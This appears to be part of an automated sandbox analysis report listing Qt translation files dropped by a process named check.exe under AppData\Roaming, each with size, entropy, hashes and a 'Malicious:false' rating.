                                                                                                                                                                                                                                      SHA-512:E9475AC80BDBBEFF54F2724A2B6BA76992F18FD1913FD8EE1540A99FD7A112B79FED5A130B6AC6D7460E4420C06354FC6E4CF7770A7C6CBD3EAC1BDAF0082DE5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):165383
                                                                                                                                                                                                                                      Entropy (8bit):4.805977227348512
                                                                                                                                                                                                                                      Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
File Type:Qt Translation file
Category:dropped
Size (bytes):89
Entropy (8bit):4.156834975253888
Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
File Type:Qt Translation file
Category:dropped
Size (bytes):161
Entropy (8bit):3.8693516202048612
Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
File Type:Qt Translation file
Category:dropped
Size (bytes):70334
Entropy (8bit):4.732724622610353
Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
File Type:Qt Translation file
Category:dropped
Size (bytes):164
Entropy (8bit):3.984562388316898
Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
File Type:Qt Translation file
Category:dropped
Size (bytes):157
Entropy (8bit):3.7731953311404336
Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
File Type:Qt Translation file
Category:dropped
Size (bytes):228428
Entropy (8bit):4.726953418955661
Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
File Type:Qt Translation file
Category:dropped
Size (bytes):65851
Entropy (8bit):4.7906769989650515
Encrypted:false
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):110
                                                                                                                                                                                                                                      Entropy (8bit):3.630483009136986
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/7zl9lAlHekDN/01MULV4LlI+rwtbWlM+N:Cw5+wUGRIRt6n
                                                                                                                                                                                                                                      MD5:16CDF5B9D48B0F795D532A0D07F5C3A0
                                                                                                                                                                                                                                      SHA1:6E403C9096B3051973E2B681DFEBBC8DD024830D
                                                                                                                                                                                                                                      SHA-256:F574A2CFD4715885C3DBDF5AE60995252673BD94FDAA9586F7E0586F6C1AC0EE
                                                                                                                                                                                                                                      SHA-512:36A0431368010157EA8A45DCB00458076CCFFC08B37E443DEBD1AAD4A30C6080803337725A7A3DCBF2B410DC7BE89CEAF6C07C46F876E4EF5B08159E3BF38E6D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......tr....R.....q.t.b.a.s.e._.t.r.....q.t.s.c.r.i.p.t._.t.r.....q.t.m.u.l.t.i.m.e.d.i.a._.t.r
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):164
                                                                                                                                                                                                                                      Entropy (8bit):4.021402900389864
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/ZlRlAlHekCczOp1MUKUt7KlI+rwtbWlM/cFKIPldkONRMugB:CwUl0+rjIUKUcIRt6M/oioM3
                                                                                                                                                                                                                                      MD5:9B101363343847FE42167183320C03F0
                                                                                                                                                                                                                                      SHA1:F0DF2CFF913E588B7CADFDABBF69F4F632B2F96A
                                                                                                                                                                                                                                      SHA-256:F1621E680E1642F9463E4B07E7E78B50F9A7BDB7C321D7302039CB3405CBDEA4
                                                                                                                                                                                                                                      SHA-512:DA14FDF8DB514902733CAAC492293873351C595EBBE0ACB0849BECE24AB822602EE64D01051F1426CD1FC13A95D8607302CF9B515D9806FDD3BD047087DE447C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......uk....v.....q.t.b.a.s.e._.u.k.....q.t.s.c.r.i.p.t._.u.k.....q.t.m.u.l.t.i.m.e.d.i.a._.u.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.u.k........)......,..
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):117347
                                                                                                                                                                                                                                      Entropy (8bit):5.8593733369029195
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:51dXW89nqEFu54aekvRzHHSVuf8j2+/xc3lhnbsfdAoz/w:v9qEFeLekvRznSVHJG3lhn+djY
                                                                                                                                                                                                                                      MD5:0D02F0DE5A12BCB338B7042DFBDAACF3
                                                                                                                                                                                                                                      SHA1:B7C10D249D8986AD8C6939B370407D07227A39F5
                                                                                                                                                                                                                                      SHA-256:28CDE75D7B32C81FEF1D4630C37B79A61DEC24B357632FF00D6365A57D8BE43B
                                                                                                                                                                                                                                      SHA-512:21F02EBA36B4411921EA3C70310B8E454E8FC2B8F09957FD6A63B71689DC381F7A5E2C3BDF2810734D659AB43D8A7BD46EF6436ECC52F75C71B5F5C313365444
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):141
                                                                                                                                                                                                                                      Entropy (8bit):3.7198292994386235
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/0N6xg/Rl/gl+kNXDelHrwtbWlMwTolIPldkOfDn:CwOO2+g6Mt63oloiUn
                                                                                                                                                                                                                                      MD5:ED4135D705AEF3D97F8BF6B8FF11F09C
                                                                                                                                                                                                                                      SHA1:308E2B8F74B863A61AD0B68F4A18ED06965EBEAA
                                                                                                                                                                                                                                      SHA-256:751ECDA0C33E061D91241268357FBD2F6B7F70A1116E714F28D22EFD61EC7A1A
                                                                                                                                                                                                                                      SHA-512:B6E6D00553A9C427130129B9D30E862028E549F372A832F0F05747C8E2A79E443F4932EC3AE177537C8BA00D26B5B6CB97D5B35426AB5229F6A468CA485BE0B1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......zh_TW....n.....q.t.b.a.s.e._.z.h._.T.W...$.q.t.m.u.l.t.i.m.e.d.i.a._.z.h._.T.W...&.q.t.x.m.l.p.a.t.t.e.r.n.s._.z.h._.T.W
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):160017
                                                                                                                                                                                                                                      Entropy (8bit):5.35627970915292
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:XGlAMfkX1M0RdaCkR8lfv8vtc8EFrVYA2I4AJZWEWgHg1C8COvzHKHC6Jp9NV0V7:XUr0RACkIwDEpV1Lgf1ubtw3Bb
                                                                                                                                                                                                                                      MD5:A7E4D0BA0FC5DF07F62CC66EC9878979
                                                                                                                                                                                                                                      SHA1:21FD131B23BDD1BBA7BBB86F3ED5C83876F45638
                                                                                                                                                                                                                                      SHA-256:E03FE68D83201543698FD7FE267DD5DFC5BFD195147E74FF2F19AC3491401263
                                                                                                                                                                                                                                      SHA-512:D9E6B10506FCF20B5B783F011908083D9DF6C5DF88E21B10D07F53A01AD6506A4B921C85335A25BAE54E27BAD7D01B6E240D58FDEEAABC7FF32014EC120C2ECF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):165337
                                                                                                                                                                                                                                      Entropy (8bit):5.332219158085151
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:9ULiyUxPoT6qx+J7FJlaaMJnxjqxq+0Uiff0mbVeb7wiEwYuYqDKBkKHMXHCIMll:9ULpIVFnpwUiEujw27ncUQUz
                                                                                                                                                                                                                                      MD5:660413AD666A6B31A1ACF8F216781D6E
                                                                                                                                                                                                                                      SHA1:654409CDF3F551555957D3DBCF8D6A0D8F03A6C5
                                                                                                                                                                                                                                      SHA-256:E448AC9E3F16C29EB27AF3012EFE21052DAA78FABFB34CD6DFF2F69EE3BD3CDB
                                                                                                                                                                                                                                      SHA-512:C6AE4B784C3D302D7EC6B9CE7B27DDAF00713ADF233F1246CD0475697A59C84D6A86BAA1005283B1F89FCC0835FD131E5CF07B3534B66A0A0AA6AC6356006B8F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):210159
                                                                                                                                                                                                                                      Entropy (8bit):4.666388181115542
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:P/DVhdlafzvZfeW+6kXEVjSVPzC3ceKdP2:xYf7UW+WjwP2
                                                                                                                                                                                                                                      MD5:B383F6D4B9EEA51C065E73ECB95BBD23
                                                                                                                                                                                                                                      SHA1:DD6C2C4B4888B0D14CEBFC86F471D0FC9B07FE42
                                                                                                                                                                                                                                      SHA-256:52E94FCC9490889B55812C5433D009B44BDC2DC3170EB55B1AF444EF4AAE1D7F
                                                                                                                                                                                                                                      SHA-512:9401940A170E22CE6515E3C1453C563D93869A3C3686C859491A1F8795520B61BF3F0BFE4687A7380C0CC0C75E25559354FDB5CEF916AF4C5B6CD9661464A54A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):174701
                                                                                                                                                                                                                                      Entropy (8bit):4.87192387061682
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:5WjuhX0CVRaakGjW9E8SSOQfX/JlwVOMxrboRPqWxXfQvO7zjBf:5iFGj1QfXr8Gd
                                                                                                                                                                                                                                      MD5:C57D0DE9D8458A5BEB2114E47B0FDE47
                                                                                                                                                                                                                                      SHA1:3A0E777539C51BB65EE76B8E1D8DCE4386CBC886
                                                                                                                                                                                                                                      SHA-256:03028B42DF5479270371E4C3BDC7DF2F56CBBE6DDA956A2864AC6F6415861FE8
                                                                                                                                                                                                                                      SHA-512:F7970C132064407752C3D42705376FE04FACAFD2CFE1021E615182555F7BA82E7970EDF5D14359F9D5CA69D4D570AA9DDC46D48CE787CFF13D305341A3E4AF79
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):181387
                                                                                                                                                                                                                                      Entropy (8bit):4.755193800761075
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:XzswP2UvZ5aZ9jFTkmq/gnBNW/+PcWrqm2Vliz0DGdaS4KSLZjwTTgwUR0toT:j3m27AjCT
                                                                                                                                                                                                                                      MD5:859CE522A233AF31ED8D32822DA7755B
                                                                                                                                                                                                                                      SHA1:70B19B2A6914DA7D629F577F8987553713CD5D3F
                                                                                                                                                                                                                                      SHA-256:7D1E5CA3310B54D104C19BF2ABD402B38E584E87039A70E153C4A9AF74B25C22
                                                                                                                                                                                                                                      SHA-512:F9FAA5A19C2FD99CCD03151B7BE5DDA613E9C69678C028CDF678ADB176C23C7DE9EB846CF915BC3CC67ABD5D62D9CD483A5F47A57D5E6BB2F2053563D62E1EF5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):220467
                                                                                                                                                                                                                                      Entropy (8bit):4.626295310482312
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:7w8go8+ph6JVB8XVXYWpSNEeg8+vaD+p4N8DDiEKugwGZulh15ce4M+4NsPYXCZW:88h8Sj286tTiDD
                                                                                                                                                                                                                                      MD5:40760A3456C9C8ABE6EA90336AF5DA01
                                                                                                                                                                                                                                      SHA1:B249AA1CBF8C2636CE57EB4932D53492E4CE36AC
                                                                                                                                                                                                                                      SHA-256:553C046835DB9ADEF15954FA9A576625366BA8BFD16637038C4BCD28E5EBACE1
                                                                                                                                                                                                                                      SHA-512:068E55F39B5250CC937E4B2BD627873132D201D351B9351BE703CD9B95D3BAFB4BD649CB4DF120A976D7C156DA679758D952CAC5E0523107244E517D323BC0C5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                                                      SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`...
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):165170
                                                                                                                                                                                                                                      Entropy (8bit):4.679910767547088
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:JVwzuvb+Ta64KQd84arHX5pxiVhA8QlOD/BnFNa8NsvsfFsfcoZtIx6F:JVwSTG4KqVaLX5pEVK7OJFczstgRtIx8
                                                                                                                                                                                                                                      MD5:C7C58A6D683797BFDD3EF676A37E2A40
                                                                                                                                                                                                                                      SHA1:809E580CDBF2FFDA10C77F8BE9BAC081978C102B
                                                                                                                                                                                                                                      SHA-256:4FFDA56BA3BB5414AB0482D1DDE64A6F226E3488F6B7F3F11A150E01F53FA4C8
                                                                                                                                                                                                                                      SHA-512:C5AED1A1AA13B8E794C83739B7FDDEAFD96785655C287993469F39607C8B9B0D2D8D222ECD1C13CF8445E623B195192F64DE373A8FB6FE43743BAF50E153CDA5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):179941
                                                                                                                                                                                                                                      Entropy (8bit):4.720938209922096
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:lvdTgO2Yl97ZWnbgTLt/Tf9IlqAeiy5uWkYGM0wNCdRjSK2YUlUs:lvdkA9vh5uWkY0MK2YXs
                                                                                                                                                                                                                                      MD5:8472CF0BF6C659177AD45AA9E3A3247C
                                                                                                                                                                                                                                      SHA1:7B5313CDA126BB7863001499FB66FB1B56C255FC
                                                                                                                                                                                                                                      SHA-256:E47FE13713E184D07FA4495DDE0C589B0E8F562E91574A3558A9363443A4FA72
                                                                                                                                                                                                                                      SHA-512:DE36A1F033BD7A4D6475681EDC93CC7B0B5DCB6A7051831F2EE6F397C971B843E1C10B66C4FB2EFF2A23DC07433E80FBF7B95E62C5B93E121AB5AD88354D9CB8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):166167
                                                                                                                                                                                                                                      Entropy (8bit):4.685212271435657
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:CLZ1w8McowCppcPwL5pYFw+G00QsbLckCiWxvq+sjs06oFm:C91wxcowspc4L5pUw+cz39CiQ7tloFm
                                                                                                                                                                                                                                      MD5:1F41FF5D3A781908A481C07B35998729
                                                                                                                                                                                                                                      SHA1:ECF3B3156FFE14569ECDF805CF3BE12F29681261
                                                                                                                                                                                                                                      SHA-256:EDB32A933CEF376A2636634E14E2977CED6284E4AA9A4AC7E2292F9CA54C384A
                                                                                                                                                                                                                                      SHA-512:A492E8AC88095A38A13549C18C68E1F61C7054AB9362C2B04C65B93E48E4A07941C8DA6950BAE79041094623E0ED330CA975110FDE8248B4D9380B9F729AD891
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):189580
                                                                                                                                                                                                                                      Entropy (8bit):4.630160941635514
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:SiaI3C87jhakhR0VGkw7ys7CskUH6y4e6IFB4xyMuhvDnJGhFaCo527arBbm07LZ:S2yGjh17yGqxTXhvQoejJd8FUjVgk
                                                                                                                                                                                                                                      MD5:EB1FB93B0BE51C2AD78FC7BA2F8B9F42
                                                                                                                                                                                                                                      SHA1:24F7FF809E2F11C579CD388FEA5A4C552FF8D4D0
                                                                                                                                                                                                                                      SHA-256:63B439DD44139AA3AED54C2EBE03FA9BC77F22C14ED8FBA8EFF2608445BB233D
                                                                                                                                                                                                                                      SHA-512:E13770AEF33B6666ED7D54E03EE20CA291D4167D673BA6C61D8E64CDD5F7FFE0A9521B95AF67BE719BF263932ECF16E2B2D0B5F3404F9BCD7879114FCC6FC474
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):138690
                                                                                                                                                                                                                                      Entropy (8bit):5.515748942553918
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:XSue8Z7T3iJsqBejt/zNHSLzdetY2ZISfC/S:XSueK3w7Ijt8zUtYAISfC/S
                                                                                                                                                                                                                                      MD5:DEAF87D45EE87794AB2DC821F250A87A
                                                                                                                                                                                                                                      SHA1:DB39C6BAA443AA9BB208043EF7FB7E3403C12D90
                                                                                                                                                                                                                                      SHA-256:E1EBCA16AFE8994356F81CA007FBDB9DDF865842010FE908923D873B687CAD3F
                                                                                                                                                                                                                                      SHA-512:276FCE81249EFFE19E95607C39F9ACB3A4AFA3F90745DA21B737A03FEA956B079BCA958039978223FD03F75AC270EC16E46095D0C6DDA327366C948EC2D05B9C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):160494
                                                                                                                                                                                                                                      Entropy (8bit):4.831791320613137
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:BmOMZadV9n51xXeQvjOiIzz7/Vs9Db3ihuJNvMfWxBNlYzYbTrIkfwb03l24cNKu:HkWa5pg0MahBHDd
                                                                                                                                                                                                                                      MD5:E9D302A698B9272BDA41D6DE1D8313FB
                                                                                                                                                                                                                                      SHA1:BBF35C04177CF290B43F7D2533BE44A15D929D02
                                                                                                                                                                                                                                      SHA-256:C61B67BB9D1E84F0AB0792B6518FE055414A68E44D0C7BC7C862773800FA8299
                                                                                                                                                                                                                                      SHA-512:12947B306874CF93ABA64BB46FAC48179C2D055E770D41AF32E50FFFB9F0C092F583AFCEA8B53FE9E238EF9370E9FFFBEB581270DFA1A7CB74EBE54D9BFF459F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):161172
                                                                                                                                                                                                                                      Entropy (8bit):4.680034416311688
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:eSfxfdO4BKJb0td5pqCOIUP/PFIM7gxGQ9sRrFM6QJ4m8ihkM:eSfxFO4BKJb0td5pnOrvCqg9mRK4IkM
                                                                                                                                                                                                                                      MD5:88D040696DE3D068F91E0BF000A9EC3E
                                                                                                                                                                                                                                      SHA1:F978B265E50D14FDDE9693EC96E99B636997B74D
                                                                                                                                                                                                                                      SHA-256:7C7DC8B45BF4E41FEC60021AB13D9C7655BE007B8123DB8D7537A119EB64A366
                                                                                                                                                                                                                                      SHA-512:F042637B61C49C91043D73B113545C383BD8D9766FD4ACC21675B4FF727652D50863E72EA811553CB26DF689F692530184A6CE8FE71F9250B5A55662AFE7D923
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):129911
                                                                                                                                                                                                                                      Entropy (8bit):5.802855391832282
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:W8YYSCjKBJ26c1Z7f25pVmuLXpxfqt7FEUWNrfQje9kWI23pKXvx:xYuKBJ01Z7u5pQuLbESUWNzAAI23pKfx
                                                                                                                                                                                                                                      MD5:608B80932119D86503CDDCB1CA7F98BA
                                                                                                                                                                                                                                      SHA1:7F440399ABA23120F40F6F4FCAE966D621A1CC67
                                                                                                                                                                                                                                      SHA-256:CBA382ACC44D3680D400F2C625DE93D0C4BD72A90102769EDFD1FE91CB9B617B
                                                                                                                                                                                                                                      SHA-512:424618011A7C06748AADFC2295109D2D916289C81B01C669DA4991499B207B781604A03259C546739A3A6CF2F8F6DFA753B23406B2E2812F5407AEE343B5CBDD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):156799
                                                                                                                                                                                                                                      Entropy (8bit):5.859529082176036
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:rvTy18hhPekHs1iNXVExWbStnn8TExgkYOvYejZOvXx4Mmf0MwUL8smk/pDZyy:y18hJ61nMStnn8TOgknQRLWZmkxNyy
                                                                                                                                                                                                                                      MD5:082E361CBAC2E3A0849F87B76EF6E121
                                                                                                                                                                                                                                      SHA1:F10E882762DCD2E60041BDD6CC57598FC3DF4343
                                                                                                                                                                                                                                      SHA-256:0179ED1B136E1CB3F583351EAA2C545BA3D83A6EE3F82C32505926A1A5F5F183
                                                                                                                                                                                                                                      SHA-512:F378A42116924E30FA0B8FFF1D3C3CB185DC35B2746DCE2818BE7C2AA95C5DE103DF44AAC74DA969C36C557F1D4DE42AC7647EC41066247F8AD2697BDED667EA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153608
                                                                                                                                                                                                                                      Entropy (8bit):4.843805801051326
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:y5pmbKIhooMbGe91MrjOhmGzP6LJbWz5XIxELpU6:yObeqrjPGzeJyJLy6
                                                                                                                                                                                                                                      MD5:BD8BDC7BBDB7A80C56DCB61B1108961D
                                                                                                                                                                                                                                      SHA1:9538C4D8BB9A95C0D9DC57C7708A99DD53A32D1F
                                                                                                                                                                                                                                      SHA-256:846E047573AE40C83671C3BA7F73E27EFC24B98C82701DA0DF9973E574178BB2
                                                                                                                                                                                                                                      SHA-512:F040EC410EBFEA21145F944E71ADCAE8E5F60907D1D3716A937A9A59A48F70C6B7EAAC91C2C554F59357A7BC820CDBD17C73A4DECC20B51F68EB79EDD35C5554
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):162982
                                                                                                                                                                                                                                      Entropy (8bit):4.841899887077422
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:sXpestp/YIFtDT8FIWYbIJmPYuIpnmxAk6mwyJNqSm9+P:sxpTDT8FIWfJmdCmxApmbnqSm9+P
                                                                                                                                                                                                                                      MD5:F9475A909A0BAF4B6B7A1937D58293C3
                                                                                                                                                                                                                                      SHA1:76B97225A11DD1F77CAC6EF144812F91BD8734BD
                                                                                                                                                                                                                                      SHA-256:CE99032A3B0BF8ABAD758895CC22837088EAD99FD2D2514E2D180693081CFE57
                                                                                                                                                                                                                                      SHA-512:8A4F1B802B6B81FF25C44251FB4A880E93E9A5FE25E36825A24BFE0EFB34E764E7E1EE585D3A56554964B7921E7813C67F12D200D6E0C5EAF4BB76B064B5C890
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):203767
                                                                                                                                                                                                                                      Entropy (8bit):5.362551648909705
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:hn4dEJ63pdhPpy6gu5fs4MHQv6sLlxnrncF423ZL9xyuXwdcX8LZuf76CW+WeXFx:aN3pdV5fZbpItXsttRY+WSq
                                                                                                                                                                                                                                      MD5:5096AD2743BF89A334FBA6A2964300D4
                                                                                                                                                                                                                                      SHA1:405F45361A537C7923C240D51B0FF1C46621C203
                                                                                                                                                                                                                                      SHA-256:3DA6605668F9178D11A838C4515478084DCFB4F9CF22F99D7A92B492DB9C224B
                                                                                                                                                                                                                                      SHA-512:7B88B501792B5831426BAA669138192ED94CC3F8323A3DF9D5287655DC4D877706908C517AB7523AE8A283BF50B47123F13B8AE40EA2F3081C3459EDC47FC8DD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
